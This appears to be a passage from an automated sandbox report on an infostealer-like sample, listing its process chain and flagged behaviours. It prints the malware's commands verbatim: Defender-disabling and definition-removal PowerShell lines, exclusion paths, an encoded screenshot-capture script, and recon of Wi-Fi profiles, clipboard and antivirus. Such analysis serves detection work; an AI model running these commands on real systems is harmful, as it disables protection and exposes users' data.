ZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	NtQuerySystemInformation: Indirect: 0x168205D
Source: C:\ProgramData\setup.exe	NtQuerySystemInformation: Direct from: 0x7FF690C442AE
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	NtEnumerateKey: Indirect: 0x2CF2842
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	NtEnumerateKey: Indirect: 0x2CF2875
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	NtEnumerateValueKey: Indirect: 0x168293D
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	NtEnumerateValueKey: Indirect: 0x168290E
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	NtDeviceIoControlFile: Indirect: 0x1682B9D
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	NtDeviceIoControlFile: Indirect: 0x2CF2B9D
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	NtEnumerateValueKey: Indirect: 0x2CF290E
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	NtEnumerateValueKey: Indirect: 0x2CF293D
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	NtEnumerateKey: Indirect: 0x1682842
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	NtQuerySystemInformation: Indirect: 0x2CF205D

Maps a DLL or memory area into another process

Source: C:\ProgramData\setup.exe

Section loaded: NULL target: unknown protection: readonly

Modifies Windows Defender protection settings

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\setup.exe

Thread register set: target process: 7520

Removes signatures from Windows Defender

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"			Jump to behavior

Writes to foreign memory regions

Source: C:\ProgramData\setup.exe

Memory written: C:\Windows\System32\dialer.exe base: 378ADE4010

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Process created: C:\Users\user\Desktop\VaTlw2kNGc.exe "C:\Users\user\Desktop\VaTlw2kNGc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: unknown unknown
